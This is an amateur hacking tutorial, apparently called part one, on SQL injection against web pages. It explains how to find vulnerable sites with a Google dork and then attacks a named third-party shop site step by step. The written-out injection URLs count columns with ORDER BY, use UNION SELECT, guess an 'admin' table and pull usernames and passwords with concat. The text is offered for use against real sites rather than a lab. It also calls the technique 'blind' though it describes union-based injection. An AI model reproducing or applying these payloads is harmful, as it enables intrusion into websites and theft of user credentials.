BLIND SQL INJECTION PART-1

Blind SQL Injection is a type of the hacker attack.
You can find out many things by using this type of attack,such as usernames,passwrds,email,and other useful data.

Ok,first I'll explain why it's caled blind.
When you do this in most cases you don't know
the name of tables and columns where data is(usernames,passwords,etc.)
So we are just guessing.

Next,thing: how to see find sites that could be vulnerable?
You just go to google and type: inurl:"detail.php?productid="
Or you can use some other Googles dork.
But for this tutorial I used dork above.
I tryed Blind SQL on this site:

http://www.sourcememory.com/

When you find a site,you have to check is it
vulnerable.
So,after detail.php?productid= you type ' or -1
but I prefer using '
Usually,you get this response:

Error performing query: You have an error in your SQL syntax; check the manual that cor


responds to your MySQL server version for the right syntax to use near '\'' at line 1

That,means website is vulnerable.
So,lets get to work.
First,we need to check the number of columns.
We do it by using command order by [number of columns]
When you type the command you must use + instead space.
And on the end of every command you must to put -- or /*
I will try to see if site has 10 columns.

http://www.sourcememory.com/detail.php?productid=-1+order+by+10--

It has 10 columns,but I tryed to find more columns
and final number of columns is 11.
But what happens if we write insted 11 cols 12 cols?
We get message:

Error performing query: Unknown column '12' in 'order clause'

Next,we know there are 11 columns.
Now we will see how many columns are displaying on the page.
We do that with the command union all select.
It like this:

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--

And in the end of the page we see:

Product Name 3
Price $5
Product Description 4

That means that columns 3,4,5 are displaying.

Now we have to guess the name of the table where
user data are.
How to do that?
Well,after number of columns,you add from+[tablename]
Example:

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--

The result we got is same like one from the code above.
That means we got the table name.
And now,we just have to guess the column name.

In

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--

3 will be changed.
So,insted of 3 we will write in some column name.
Example:

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,username,4,5,6,7,8,9,10,11+from+admin--

And we got username.
We will use concat to display more data instead of 3(we use concat to display username and password.)
Example:

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+admin--

And thats it.
Oh,one more thing:
0x3a is replacement for ":"
----------------------------------------------
Lets repeat the basics:
order by - for finding the num of columns
union select all - selecting the num of columns
from [tablename]- reading data from some table